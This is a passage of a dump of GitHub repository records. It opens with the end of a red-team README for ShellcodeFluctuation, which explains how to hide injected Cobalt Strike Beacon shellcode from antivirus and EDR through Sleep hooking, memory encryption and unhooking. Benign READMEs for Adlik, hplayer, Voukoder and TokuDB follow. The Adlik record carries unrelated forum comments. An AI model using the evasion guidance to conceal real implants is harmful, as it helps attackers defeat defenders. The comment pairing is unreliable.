with another Petya. In that manner I decided to skip some of the gore details that I use in my professional tooling used to deliver commercial, contracted Adversary Simulation exercises. Giving out the seed hopefully will be met with community professionals able to grow the concept in their own toolings, assuming they'll have apropriate skills.\n\n2. I'd far prefer to move this entire logic to the [_User-Defined Reflective Loader_](https://www.cobaltstrike.com/help-user-defined-reflective-loader) of Cobalt Strike facilitating Red Team groups in elevated chances for their delivery phase. But firstly, see point (1), secondly that technology is currently limited to 5KBs size for their RDLLs, making me completely unable to implement it there as well. For those of us who build custom C2 & implants for in-house Adversary Simulation engagements - they now have received a sample implementation that will surely help them embellishing their tooling accordingly.\n\n---\n\n## How do I use it?\n\nLook at the code and its implementation, understand the concept and re-implement the concept within your own Shellcode Loaders that you utilise to deliver your Red Team engagements.\nThis is an yet another technique for advanced in-memory evasion that increases your Teams' chances for not getting caught by Anti-Viruses, EDRs and Malware Analysts taking look at your implants.\n\nWhile developing your advanced shellcode loader, you might also want to implement:\n\n- **Process Heap Encryption** - take an inspiration from this blog post: [Hook Heaps and Live Free](https://www.arashparsa.com/hook-heaps-and-live-free/) - which can let you evade Beacon configuration extractors like [`BeaconEye`](https://github.com/CCob/BeaconEye)\n- [**Spoof your thread's call stack**](https://github.com/mgeeky/ThreadStackSpoofer) before sleeping (that could evade scanners attempting to examine process' threads and their call stacks in attempt to hunt for `MEM_PRIVATE` memory allocations referenced by these threads)\n- **Clear out any leftovers from Reflective Loader** to avoid in-memory signatured detections\n- **Unhook everything you might have hooked** (such as AMSI, ETW, WLDP) before sleeping and then re-hook afterwards.\n\n---\n\n## Example run\n\nUse case:\n\n```\nUsage: ShellcodeFluctuation.exe \n:\n -1 - Read shellcode but dont inject it. Run in an infinite loop.\n 0 - Inject the shellcode but don't hook kernel32!Sleep and don't encrypt anything\n 1 - Inject shellcode and start fluctuating its memory with standard PAGE_READWRITE.\n 2 - Inject shellcode and start fluctuating its memory with ORCA666's PAGE_NOACCESS.\n```\n\nWhere:\n- `` is a path to the shellcode file\n- `` as described above, takes `-1`, `0` or `1`\n\n\nExample run that spoofs beacon's thread call stack:\n\n```\nC:\\> ShellcodeFluctuation.exe ..\\..\\tests\\beacon64.bin 1\n\n[.] Reading shellcode bytes...\n[.] Hooking kernel32!Sleep...\n[.] Injecting shellcode...\n[+] Shellcode is now running. PID = 9456\n[+] Fluctuation initialized.\n Shellcode resides at 0x000002210C091000 and occupies 176128 bytes. XOR32 key: 0x1e602f0d\n[>] Flipped to RW. Encoding...\n\n===> MySleep(5000)\n\n[.] Decoding...\n[>] Flipped to RX.\n[>] Flipped to RW. Encoding...\n\n===> MySleep(5000)\n```\n\n---\n\n## Word of caution\n\nIf you plan on adding this functionality to your own shellcode loaders / toolings be sure to **AVOID** unhooking `kernel32.dll`.\nAn attempt to unhook `kernel32` will restore original `Sleep` functionality preventing our callback from being called.\nIf our callback is not called, the thread will be unable to spoof its own call stack by itself.\n\nIf that's what you want to have, than you might need to run another, watchdog thread, making sure that the Beacons thread will get spoofed whenever it sleeps.\n\nIf you're using Cobalt Strike and a BOF `unhook-bof` by Raphael's Mudge, be sure to check out my [Pull Request](https://github.com/Cobalt-Strike/unhook-bof/pull/1) that adds optional parameter to the BOF specifying libraries that should not be unhooked.\n\nThis way you can maintain your hooks in kernel32:\n\n```\nbeacon> unhook kernel32\n[*] Running unhook.\n Will skip these modules: wmp.dll, kernel32.dll\n[+] host called home, sent: 9475 bytes\n[+] received output:\nntdll.dll <.text>\nUnhook is done.\n```\n\n[Modified `unhook-bof` with option to ignore specified modules](https://github.com/mgeeky/unhook-bof)\n\n---\n\n## Final remark\n\nThis PoC was designed to work with Cobalt Strike's Beacon shellcodes. The Beacon is known to call out to `kernel32!Sleep` to await further instructions from its C2. \nThis loader leverages that fact by hooking `Sleep` in order to perform its housekeeping. \n\nThis implementation might not work with other shellcodes in the market (such as _Meterpreter_) if they don't use `Sleep` to cool down. \nSince this is merely a _Proof of Concept_ showing the technique, I don't intend on adding support for any other C2 framework.\n\nWhen you understand the concept, surely you'll be able to translate it into your shellcode requirements and adapt the solution for your advantage.\n\nPlease do not open Github issues related to \"this code doesn't work with XYZ shellcode\", they'll be closed immediately.\n\n---\n\n### \u2615 Show Support \u2615\n\nThis and other projects are outcome of sleepless nights and **plenty of hard work**. If you like what I do and appreciate that I always give back to the community,\n[Consider buying me a coffee](https://github.com/sponsors/mgeeky) _(or better a beer)_ just to say thank you! \ud83d\udcaa \n\n---\n\n## Author\n\n``` \n Mariusz Banach / mgeeky, 21\n \n (https://github.com/mgeeky)\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Adlik/Adlik", "link": "https://github.com/Adlik/Adlik", "tags": ["deep-learning", "inference", "tensorflow-serving", "openvino", "tensorrt", "compiler", "inference-engine", "model-optimizer", "docker-images"], "stars": 648, "description": "Adlik: Toolkit for Accelerating Deep Learning Inference", "lang": "C++", "repo_lang": "", "readme": "# Adlik\n\n[![Build Status](https://dev.azure.com/Adlik/GitHub/_apis/build/status/Adlik.Adlik?branchName=master)](https://dev.azure.com/Adlik/GitHub/_build/latest?definitionId=1&branchName=master)\n[![Tests](https://img.shields.io/azure-devops/tests/Adlik/GitHub/1/master)](https://dev.azure.com/Adlik/GitHub/_build/latest?definitionId=1&branchName=master)\n[![Coverage](https://img.shields.io/azure-devops/coverage/Adlik/GitHub/1/master)](https://dev.azure.com/Adlik/GitHub/_build/latest?definitionId=1&branchName=master)\n[![Bors enabled](https://bors.tech/images/badge_small.svg)](https://app.bors.tech/repositories/20625)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/4513/badge)](https://bestpractices.coreinfrastructure.org/projects/4513)\n\n***Adlik*** [\u00e6dlik] is an end-to-end optimizing framework for deep learning models. The goal of Adlik is to accelerate deep\nlearning inference process both on cloud and embedded environment.\n\n![Adlik schematic diagram](resources/arch.png)\n\nWith Adlik framework, different deep learning models can be deployed to different platforms with high performance in a\nmuch flexible and easy way.\n\n![Using Adlik to Deploy Models in Cloud/Edge/Device](resources/deployment.png)\n\n1. In cloud environment, the compiled model and Adlik Inference Engine should be built as a docker image, and deployed\nas a container.\n\n2. In edge environment, Adlik Inference Engine should be deployed as a container. The compiled model should be transferred\nto edge environment, and the Adlik Inference Engine should automatically update and load model.\n\n3. In device environment, Adlik Inference Engine and the compiled model should be compiled into a binary file (***so***\nor ***lib***). Users who want to run model inference on device should link user defined AI function and Adlik binary\nfile to the execution file, and run directly.\n\n## [Inference performance of Adlik](https://github.com/Adlik/Adlik/tree/master/benchmark#inference-performance-of-adlik)\n\nWe test the inference performance of Adlik on the same CPU or GPU using the simple CNN model (MNIST model),\nthe ResNet50 model, and InceptionV3 with different serving engines. The test performance data of Adlik\non different models are as follows:\n\n- [The test result of the MNIST model](https://github.com/Adlik/Adlik/tree/master/benchmark#the-test-result-of-the-mnist-model)\n- [The test result of the ResNet50 model](https://github.com/Adlik/Adlik/tree/master/benchmark#the-test-result-of-the-resnet50-model)\n- [The test result of the InceptionV3 model](https://github.com/Adlik/Adlik/tree/master/benchmark#the-test-result-of-the-inceptionv3-model)\n- [The test result of the YoloV3 model](https://github.com/Adlik/Adlik/tree/master/benchmark#the-test-result-of-the-YoloV3-model)\n- [The test result of the Bert model](https://github.com/Adlik/Adlik/tree/master/benchmark#the-test-result-of-the-Bert-model)\n- [The test result of PaddlePaddle model](benchmark/PADDLE_RESULT.md)\n\n## Contents\n\n### [Model Optimizer](https://github.com/Adlik/model_optimizer/blob/master/README.md)\n\n***Model optimizer*** focuses on specific hardware and runs on it to achieve acceleration. The proposed\nframework mainly consists of two categories of algorithm components, i.e. pruner and quantizer.\n\n### [Model Compiler](model_compiler/README.md)\n\n***Model compiler*** supports several optimizing technologies like pruning, quantization and structural compression,\nwhich can be easily used for models developed with TensorFlow, Keras, PyTorch, etc.\n\n### [Serving Engine](adlik_serving/README.md)\n\n***Serving Engine*** provides deep learning models with optimized runtime based on the deployment environment. Put\nsimply, based on a deep learning model, the users of Adlik can optimize it with model compiler and then deploy it to a\ncertain platform with Adlik serving platform.\n\n## Getting Started\n\n- [Tutorials](TUTORIALS.md)\n\n- [Samples](examples)\n\n## Docker images\n\nAll Adlik compiler images and serving images are stored in [Alibaba Cloud](https://free.aliyun.com/). These images can\nbe downloaded and used directly, users do not need to build the Adlik on [Ubuntu](https://ubuntu.com). Users can use\nthe compiler images to compile model from H5, CheckPoint, FrozenGraph, ONNX and SavedModel to Openvino, TensorFlow,\nTensorFlow Lite, TensorRT. Users also can use the serving images for model inference.\n\nDocker pull command:\n\n ```shell script\n docker pull docker_image_name:tag\n ```\n\n### Compiler docker images\n\nThe compiler docker images can be used in CPU and GPU. In the CPU, you can compile the model from source type to TensorFlow\nmodel, OpenVino model and TensorFlow Lite model. And in the CPU, you can compile the model from source type to TensorFlow\nmodel, and TensorRT model. The name and label of compiler mirror are shown below, and the first half of label\nrepresents the version of TensorRT, the latter part of label represents the version of CUDA:\n\nregistry.cn-beijing.aliyuncs.com/adlik/model-compiler:v0.5.0_trt7.2.1.6_cuda11.0\n\n#### Using model compiler image compile model\n\n1. Run the image.\n\n ```shell script\n docker run -it --rm -v source_model:/mnt/model\n registry.cn-beijing.aliyuncs.com/adlik/model-compiler:v0.5.0_trt7.2.1.6_cuda11.0 bash\n ```\n\n2. Configure the json file or environment variables required to compile the model.\n\n The [config_schema.json](model_compiler/config_schema.json) describle the json file field information,\n and for the example, you can reference [compiler_json_example.json](docker-images/compiler_json_example.json).\n For the environment variable field description, see [env_field.txt](docker-images/env_field.txt), for the example,\n reference [compiler_env_example.txt](docker-images/compiler_env_example.txt).\n\n Note: The checkpoint model must be given the input and output op names of the model when compiling, and other models\n can be compiled without the input and output op names of the model.\n\n3. Compile the model.\n\n Compilation instructions (json file mode):\n\n ```shell script\n python3 \"-c\" \"import json; import model_compiler as compiler; file=open('/mnt/model/serving_model.json','r');\n request = json.load(file);compiler.compile_model(request); file.close()\"\n ```\n\n Compilation instructions (environment variable mode):\n\n ```shell script\n python3 \"-c\" \"import model_compiler.compiler as compiler;compiler.compile_from_env()\"\n ```\n\n### Serving docker images\n\nThe serving docker images contains CPU and GPU mirrors. The label of openvino image represents the version of OpenVINO.\nAnd for the TensorRT image the first half of label represents the version of TensorRT, the latter part of label\nrepresents the version of CUDA. The names and labels of serving mirrors are as follows:\n\nCPU:\n\nregistry.cn-beijing.aliyuncs.com/adlik/serving-tflite-cpu:v0.5.0\n\nregistry.cn-beijing.aliyuncs.com/adlik/serving-tensorflow-cpu:v0.5.0\n\nregistry.cn-beijing.aliyuncs.com/adlik/serving-openvino:v0.5.0\n\nregistry.cn-beijing.aliyuncs.com/adlik/serving-libtorch-cpu:v0.5.0\n\nGPU:\n\nregistry.cn-beijing.aliyuncs.com/adlik/serving-tftrt-gpu:v0.5.0\n\nregistry.cn-beijing.aliyuncs.com/adlik/serving-tensorrt:v0.5.0_trt7.2.1.6_cuda11.0\n\nregistry.cn-beijing.aliyuncs.com/adlik/serving-libtorch-gpu:v0.5.0\n\n### Using the serving images for model inference\n\n1. Run the mirror and pay attention to mapping out the service port.\n\n ```shell script\n docker run -it --rm -p 8500:8500 -v compiled_model:/model\n registry.cn-beijing.aliyuncs.com/adlik/serving-openvino:v0.5.0 bash\n ```\n\n2. Load the compiled model in the image and start the service.\n\n ```shell script\n adlik-serving --grpc_port=8500 --http_port=8501 --model_base_path=/model\n ```\n\n3. Install the client wheel package [adlik serving package](\n ) or [adlik\n serving gpu package](\n ) locally,\n execute the inference code, and perform inference.\n\nNote: If the service port is not mapped when you run the mirror, you need install the [adlik serving package](\n ) or [adlik\n serving gpu package](\n ) in the\n container. Then execute the inference code, and perform inference in the container.\n\n## Build\n\nThis guide is for building Adlik on [Ubuntu](https://ubuntu.com) systems.\n\nFirst, install [Git](https://git-scm.com/download) and [Bazel](https://docs.bazel.build/install.html).\n\nThen, clone Adlik and change the working directory into the source directory:\n\n ```sh\n git clone https://github.com/Adlik/Adlik.git\n cd Adlik\n ```\n\n### Build clients\n\n1. Install the following packages:\n - `python3-setuptools`\n - `python3-wheel`\n2. Build clients:\n\n ```sh\n bazel build //adlik_serving/clients/python:build_pip_package -c opt\n ```\n\n3. Build pip package:\n\n ```sh\n mkdir /tmp/pip-packages && bazel-bin/adlik_serving/clients/python/build_pip_package /tmp/pip-packages\n ```\n\n### Build serving\n\nFirst, install the following packages:\n\n- `automake`\n- `libtbb2`\n- `libtool`\n- `make`\n- `python3-six`\n\n#### Build serving with OpenVINO runtime\n\n1. Install `openvino-` package from\n [OpenVINO](https://docs.openvinotoolkit.org/2022.1/openvino_docs_install_guides_installing_openvino_apt.html).\n2. Assume the installation path of OpenVINO is `/opt/intel/openvino_VERSION`, run the following command:\n\n ```sh\n export INTEL_CVSDK_DIR=/opt/intel/openvino_2022\n export InferenceEngine_DIR=$INTEL_CVSDK_DIR/runtime/cmake\n bazel build //adlik_serving \\\n --config=openvino \\\n -c opt\n ```\n\n#### Build serving with TensorFlow CPU runtime\n\n1. Run the following command:\n\n ```sh\n bazel build //adlik_serving \\\n --config=tensorflow-cpu \\\n -c opt\n ```\n\n#### Build serving with TensorFlow GPU runtime\n\nAssume building with CUDA version 11.0.\n\n1. Install the following packages from\n [here](https://docs.nvidia.com/cuda/cuda-installation-guide-linux/index.html#ubuntu-installation) and\n [here](https://docs.nvidia.com/deeplearning/sdk/cudnn-install/index.html#ubuntu-network-installation):\n\n - `cuda-nvprune-11-0`\n - `cuda-nvtx-11-0`\n - `cuda-cupti-dev-11-0`\n - `libcublas-dev-11-0`\n - `libcudnn8=*+cuda11.0`\n - `libcudnn8-dev=*+cuda11.0`\n - `libcufft-dev-11-0`\n - `libcurand-dev-11-0`\n - `libcusolver-dev-11-0`\n - `libcusparse-dev-11-0`\n - `libnvinfer7=7.2.*+cuda11.0`\n - `libnvinfer-dev=7.2.*+cuda11.0`\n - `libnvinfer-plugin7=7.2.*+cuda11.0`\n - `libnvinfer-plugin-dev=7.2.*+cuda11.0`\n\n2. Run the following command:\n\n ```sh\n env TF_CUDA_VERSION=11.0 TF_NEED_TENSORRT=1 \\\n bazel build //adlik_serving \\\n --config=tensorflow-gpu \\\n -c opt \\\n --incompatible_use_specific_tool_files=false\n ```\n\n#### Build serving with TensorFlow Lite CPU runtime\n\n1. Run the following command:\n\n ```sh\n bazel build //adlik_serving \\\n --config=tensorflow-lite-cpu \\\n -c opt\n ```\n\n#### Build serving with TensorRT runtime\n\nAssume building with CUDA version 11.0.\n\n1. Install the following packages from\n [here](https://docs.nvidia.com/cuda/cuda-installation-guide-linux/index.html#ubuntu-installation) and\n [here](https://docs.nvidia.com/deeplearning/sdk/cudnn-install/index.html#ubuntu-network-installation):\n\n - `cuda-cupti-dev-11-0`\n - `cuda-nvml-dev-11-0`\n - `cuda-nvrtc-11-0`\n - `libcublas-dev-11-0`\n - `libcudnn8=*+cuda11.0`\n - `libcudnn8-dev=*+cuda11.0`\n - `libcufft-dev-11-0`\n - `libcurand-dev-11-0`\n - `libcusolver-dev-11-0`\n - `libcusparse-dev-11-0`\n - `libnvinfer7=7.2.*+cuda11.0`\n - `libnvinfer-dev=7.2.*+cuda11.0`\n - `libnvonnxparsers7=7.2.*+cuda11.0`\n - `libnvonnxparsers-dev=7.2.*+cuda11.0`\n2. Run the following command:\n\n ```sh\n env TF_CUDA_VERSION=11.0 \\\n bazel build //adlik_serving \\\n --config=TensorRT \\\n -c opt \\\n --action_env=LIBRARY_PATH=/usr/local/cuda-11.0/lib64/stubs \\\n --incompatible_use_specific_tool_files=false\n ```\n\n#### Build serving with TF-TRT runtime\n\nAssume building with CUDA version 11.0.\n\n1. Install the following packages from\n [here](https://docs.nvidia.com/cuda/cuda-installation-guide-linux/index.html#ubuntu-installation) and\n [here](https://docs.nvidia.com/deeplearning/sdk/cudnn-install/index.html#ubuntu-network-installation):\n\n - `cuda-cupti-dev-11-0`\n - `libcublas-dev-11-0`\n - `libcudnn8=*+cuda11.0`\n - `libcudnn8-dev=*+cuda11.0`\n - `libcufft-dev-11-0`\n - `libcurand-dev-11-0`\n - `libcusolver-dev-11-0`\n - `libcusparse-dev-11-0`\n - `libnvinfer7=7.2.*+cuda11.0`\n - `libnvinfer-dev=7.2.*+cuda11.0`\n - `libnvinfer-plugin7=7.2.*+cuda11.0`\n - `libnvinfer-plugin-dev=7.2.*+cuda11.0`\n\n2. Run the following command:\n\n ```sh\n env TF_CUDA_VERSION=11.0 TF_NEED_TENSORRT=1 \\\n bazel build //adlik_serving \\\n --config=tensorflow-tensorrt \\\n -c opt \\\n --incompatible_use_specific_tool_files=false\n ```\n\n#### Build serving with Tvm runtime\n\n1. Install the following packages:\n\n - `build-essential`\n - `cmake`\n - `tvm`\n\n2. Run the following command:\n\n ```sh\n bazel build //adlik_serving \\\n --config=tvm \\\n -c opt\n ```\n\n### Build in Docker\n\nThe `ci/docker/build.sh` file can be used to build a Docker images that contains all the requirements for building\nAdlik. You can build Adlik with the Docker image.\n\n> Note: If you build the runtime with GPU in a Docker image, you need to add the CUDA environment variables in the\n> Dockerfile, such as:\n>\n> ```dockerfile\n> ENV NVIDIA_VISIBLE_DEVICES all\n> ENV NVIDIA_DRIVER_CAPABILITIES compute, utility\n> ```\n\n### Release\n\nThe version of the service engine Adlik supports.\n\n| | TensorFlow 1.14 | TensorFlow 2.x | OpenVINO 2022 | TensorRT 6 | TensorRT 7 |\n| ------------ | :-------------: | :------------: | :-----------: | :--------: | :--------: |\n| Keras | \u2713 | \u2713 | \u2713 | \u2713 | \u2713 |\n| TensorFlow | \u2713 | \u2713 | \u2713 | \u2713 | \u2713 |\n| PyTorch | \u2717 | \u2717 | \u2713 | \u2713 | \u2713 |\n| PaddlePaddle | \u2713 | \u2713 | \u2713 | \u2713 | \u2713 |\n\n## License\n\nApache License 2.0\n", "readme_type": "markdown", "hn_comments": "Previous post or links from previous posts I found useful:https://news.ycombinator.com/item?id=26243107https://codeburst.io/tech-stack-how-i-quickly-developed-and-...https://medium.com/saveboost/how-i-chose-our-startup-stack-7...The next one that tells me they are alike will get me to agree:\n both software projects and building projects are: - always late and \n - always more expensive than planned.\n\nI guess that's not what they wanted to hear.\n(honestly, it's a poor metaphor)I think there\u2019s a large disservice in comparing architecture and construction in the real world to software.Software is more like keeping quicksand in your hands.The construction of houses take mature engineering principles and calculations of a physical world to create buildings standing for centuries.Most (not all) changes after construction is veneer - on the surface and replacing of bits 1:1.Software on the other hand need constant attention and massive changes to the very foundation is not uncommon. It might go as deep as a change in hardware, say moving from one arch to another, or changing of the software architecture such as moving to a distributed, eventually consistent persistence layer or vice versa.It\u2019s not like concrete stops functioning if you don\u2019t keep touching it either. Don\u2019t get me started on build pipelines, testing, integrations etc etcAnd next up: product!\nYesterday we thought it was a new empire state building buuuut it turned out we need to build a modern day coliseum.Followed by \u201cproject management\u201d - this may be the most obvious sign that we\u2019re off in comparison. A building need project management! Software on the other hand is often ruined by it, as software is supposed to be malleable.One is soft, the other is hard.Trying to liken software production to building construction is something I\u2019ve seen create various problems in this field of ours for a long time.Why even think about software as a building at all? Just think about it as software. I don't understand the urge to draw parallels to other fields.Software systems have always felt more organic to me than any building. A building will go years without any major changes or renovations. Your average modern software application sees multiple changes per day. And the functionality of the software evolves quite iteratively and rapidly over time. It also has to respond to various environmental stresses.It seems another metaphor to describe \"pace layering\" in complex system.\nHere's an article I always liked on the topic and inspired me years ago: https://jods.mitpress.mit.edu/pub/issue3-brand/release/2I often ended up applying this simple principle to software, especially design systems, e.g. in atomic design where atom, molecules, organism, etc. Can be developed as layers with different pace of change and optimized around it.I'm curious if anybody knows where the concept came from originally. Was there already something like that in Greek philosophy, or was introduced with the study of complex systems? Or maybe it was indeed from architecture?> Layers of change: How buildings and software are alike\"If Builders Built Buildings the Way Programmers Wrote Programs, Then the First Woodpecker That Came Along Would Destroy Civilization\"My daughter is in 3rd grade and is bored with her math lessons, so I started to do my own nightly math lessons. Long division was a big hit, but what I really want is to find some accessable number theory material, preferably about interesting patterns. Any recommendations?Probably something in the 10-15 age range, or 8-10 and originally in RussianQuanta is doing really solid science journalism these days. They have a number of fantastic podcasts as well.It's bankrolled 100% by this generous billionaire\nhttps://en.wikipedia.org/wiki/Jim_Simons_(mathematician) and I hope he continues to fund itThis guy has Sitzfleisch, a very useful thing for a mathematician to have.Weird how this came out on the day I bomb my probability test. T_TCongratulations to him! That's an amazing accomplishment. There's a lesson in this line> For more than a year and a half, Larsen couldn\u2019t stop thinking about a certain math problem.It's rare to be able to focus on something for that long without giving up.Summary:1. Fermat's Little Theorem: if p is prime, then b^p = b (mod p) for all integers b. i.e. b^p - b is always a multiple of p. 8^3-8 = 512-8 = 504 = 168 x 3.2. Is the inverse true? Does b^n - b = 0 (mod n) mean that n is prime? No. Sometimes n is non-prime (like n=561, divisible by 3). We call these n, Carmichael numbers.3. Okay, so these numbers exist. How common are they? For primes we know they're common. Bertrand postulated (Chebyshev proved) that for any n>1, there is a prime p between n and 2n. That's cool!4. Is it true that there is such a bound for these pretend-primes? Well, we have an interesting fact that there are x^(1/3) of them below any x, once we pass a certain point (i.e. there exists an X such that there are x^(1/3) of them below any x > X) so that makes us think it could be true! Worth seeing!5. But what about this common-ness measure like the B-C result for primes? Well, it turns out that it exists. It ain't as pretty as just between straight integer multiples, but the fact that it exists in some shape at all is cool! That's what this kid proved. Absolutely rollicking fact. https://arxiv.org/abs/2111.06963I've known quite a few families where both parents are scientists or software engineers or quantitative engineers.Very frequently, their children will have a scary intuitive understanding of concepts that took my many years to understand (I'm a slow learner; didn't really understand hash tables until my 30s) and then apply their abilities to be in the higher echelons at science in a very young age. I see a similar thing in the children of world-class athletes.very impressive to have such fundamental contributions at such an early age. To even know it's applicability to modern day cryptography is also really impressive. All the best to Daniel Larsen!Nobody is talking about the proof, but about the fact that the person who produced it was younger than them and they are trying to explain the achievement by innate abilities or parent influence. The fact is just that most of people don't want to do something like that. They just want to be someone who do things like that.Congratulations! This is a great achievement at his age. Maybe a Fields medal next?Getting older, sometimes it can be so tough to accept the fact that people a fraction of your age achieve things you never will.Given the extreme connectivity of the present, we are also exposed to brilliant minds with incredible capabilities, making us (me at least) feel even more incapable..I guess it is a lesson for humility.Good job Daniel, you show us !I knew a guy in high school that carried around a sub-compact notebook and one day in science class we were learning about how to factor quadratic equations (a review of old math we should know) and this guy was not paying attention at all, just typing away. The teacher asked him what he was doing that was so important that he couldn't listen, and to please come up and solve the problem.This kid walked straight up to the board and explained how you can design a computer program to factor any polynomial equation string input to it, and in fact had implemented a polynomial equation factoring program while the teacher explained how to factor simple quadratic equations.Since then, I don't feel bad if someone achieves more than me, because clearly there are some people out there that are born to solve certain classes of problems (maybe their brain structure is better for those, or something, who knows).TL;DR - a Nigerian street vendor was brutally murdered in broad daylight on the streets of Italy. People just stood by and recorded the video but no one intervened. A neo-fascist, Giorgia Meloni, is expected to become the next PM of Italy after the September elections.Unpaywalled: https://archive.ph/OMeDaJournal Reference: https://www.cell.com/cell-reports/fulltext/S2211-1247(22)010...Summary:\nThe human face is one of the most visible features of our unique identity as individuals. Interestingly, monozygotic twins share almost identical facial traits and the same DNA sequence but could exhibit differences in other biometrical parameters. The expansion of the world wide web and the possibility to exchange pictures of humans across the planet has increased the number of people identified online as virtual twins or doubles that are not family related. Herein, we have characterized in detail a set of \u201clook-alike\u201d humans, defined by facial recognition algorithms, for their multiomics landscape. We report that these individuals share similar genotypes and differ in their DNA methylation and microbiome landscape. These results not only provide insights about the genetics that determine our face but also might have implications for the establishment of other human anthropometric properties and even personality characteristics.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ithewei/hplayer", "link": "https://github.com/ithewei/hplayer", "tags": ["player", "qt", "ffmpeg", "opengl", "opencv"], "stars": 647, "description": "A multi-screen player using Qt + FFmpeg.", "lang": "C++", "repo_lang": "", "readme": "# Multi-screen player\n\n## demand analysis\n\n- Make a VLC-like player that can play file sources, network sources, and device capture sources;\n- The interface requires a multi-screen monitoring grid, which can freely switch between multi-screen styles, and supports dragging and merging;\n\n## Outline Design\n\n- Use Qt to implement the interface;\n- Use FFmpeg to pull stream, codec, transcode;\n- Use OpenCV to process images;\n- Render video frames using OpenGL;\n\n## detailed design\n\n**interface design**\n\n![](hplayer.png)\n\n**Multi-screen renderings**\n\n![](hplayer4.png)\n\n![](hplayer25.png)\n\n## Post-planning\n\n- Add monitor capture source;\n- Add picture, text, time overlay function;\n- Add multi-screen synthesis function;\n- Add streaming and recording functions;\n- Add face detection and recognition function;\n- Add beauty function;\n\n## Submodule\n```\ngit clone --recurse-submodules https://github.com/ithewei/hplayer.git\n```\nor\n```\ngit clone https://github.com/ithewei/hplayer.git\ngit submodule update --init\n```\n\n## Mirror\n```\nhttps://gitee.com/ithewei/hplayer.git\n```\n\n##Build\n\nsee BUILD.md\n\n## Project Blog\n\nhttps://hewei.blog.csdn.net/article/category/9275796", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Vouk/voukoder", "link": "https://github.com/Vouk/voukoder", "tags": ["x264", "libav", "x265", "hevc", "prores", "ffmpeg", "prm", "nvenc", "h264", "h265"], "stars": 647, "description": "Provides an easy way to include the FFmpeg encoders in other windows applications.", "lang": "C++", "repo_lang": "", "readme": "\n\n

\n
INFOS & DOWNLOAD HERE: WWW.VOUKODER.ORG

\n\n**Available application connectors:**\n\nFind these connectors at the [application connectors page](https://github.com/Vouk/voukoder-connectors):\n- Adobe Premiere / Media Encoder\n- Adobe After Effects\n- DaVinci Resolve\n- VEGAS Pro\n- VirtualDub 2\n\n**Stay up-to-date, discuss on the forums and get all announcements and news at https://www.voukoder.org.**\n- Patreon: https://www.patreon.com/voukoder\n- Ko-fi: https://ko-fi.com/voukoder\n- Paypal: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=S6LGDW9QZYBTL&source=url\n- Twitter: https://twitter.com/LordVouk\n\n## Contributors\n\n### Code Contributors\n\nThis project exists thanks to all the people who contribute. [[Contribute](CONTRIBUTING.md)].\n\n\n### Financial Contributors\n\nBecome a financial contributor and help us sustain our community. [[Contribute](https://opencollective.com/voukoder/contribute)]\n\n#### Individuals\n\n\n\n#### Organizations\n\nSupport this project with your organization. Your logo will show up here with a link to your website. [[Contribute](https://opencollective.com/voukoder/contribute)]\n\n\n\n\n\n\n\n\n\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "percona/tokudb-engine", "link": "https://github.com/percona/tokudb-engine", "tags": ["ps"], "stars": 647, "description": "Percona TokuDB is a high-performance, write optimized, compressing, transactional storage engine for Percona Server. Issue tracker: https://tokutek.atlassian.net/browse/DB/ Wiki: https://github.com/Percona/tokudb-engine/wiki Downloads:", "lang": "C++", "repo_lang": "", "readme": "TokuDB\n======\n\nTokuDB is a high-performance, write optimized, transactional storage engine for Percona Server and MySQL.\nFor more details, see our [product page][products].\n\nThis repository contains the MySQL plugin that uses the [PerconaFT][perconaft] core.\n\n[products]: https://www.percona.com/software/percona-tokudb\n[perconaft]: http://github.com/Percona/PerconaFT\n\nDownload\n--------\n\n* [Percona Server 5.6 + TokuDB](http://www.percona.com/downloads/)\n\nBuild\n-----\n\nBefore you start, make sure you have a C++11-compatible compiler (GCC >=\n4.7 is recommended), as well as CMake >=2.8.8, and the libraries and\nheader files for valgrind,zlib, and Berkeley DB. We are using the gcc 4.7\nin devtoolset-1.1.\n\nOn CentOS, `yum install valgrind-devel zlib-devel libdb-devel`\n\nOn Ubuntu, `apt-get install valgrind zlib1g-dev libdb-dev`\n\nYou can set the compiler by passing `--cc` and `--cxx` to the script, to\nselect one that's new enough. The default is `scripts/make.mysql.bash\n--cc=gcc47 --cxx=g++47`, which may not exist on your system.\n\nWe use gcc from devtoolset-1.1 on CentOS 5.9 for builds.\n\nTo build a complete set of Percona Server and TokuDB, follow the instructions at\n[build a debug environment][howtobuild].\n\n[howtobuild]: https://github.com/percona/tokudb-percona-server-5.6/wiki/Build-a-debug-environment\n\nContribute\n----------\n\nPlease report TokuDB bugs to the [issue tracker][jira].\n\nWe have two publicly accessible mailing lists:\n\n - tokudb-user@googlegroups.com is for general and support related\n questions about the use of TokuDB.\n - tokudb-dev@googlegroups.com is for discussion of the development of\n TokuDB.\n\nAll source code and test contributions must be provided under a [BSD 2-Clause][bsd-2] license. For any small change set, the license text may be contained within the commit comment and the pull request. For larger contributions, the license must be presented in a COPYING. file in the root of the tokudb-engine project. Please see the [BSD 2-Clause license template][bsd-2] for the content of the license text.\n\n[jira]: https://tokutek.atlassian.net/browse/DB/\n[bsd-2]: http://opensource.org/licenses/BSD-2-Clause/\n\nLicense\n-------\n\nTokuDB is available under the GPL version 2 and AGPL version 3. See [COPYING][copying]\n\nPerconaFT is a part of TokuDB and is available under the GPL version 2,\nand AGPL version 3, with slight modifications. See [COPYING.AGPLv3][agpllicense],\n[COPYING.GPLv2][gpllicense], and\n[PATENTS][patents].\n\n[agpllicense]: http://github.com/Perona/PerconaFT/blob/master/COPYING.AGPLv3\n[gpllicense]: http://github.com/Perona/PerconaFT/blob/master/COPYING.GPLv2\n[patents]: http://github.com/Perona/PerconaFT/blob/master/PATENTS\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "APRIL-ZJU/lidar_IMU_calib", "link": "https://github.com/APRIL-ZJU/lidar_IMU_calib", "tags": [], "stars": 647, "description": "Targetless Calibration of LiDAR-IMU System Based on Continuous-time Batch Estimation", "lang": "C++", "repo_lang": "", 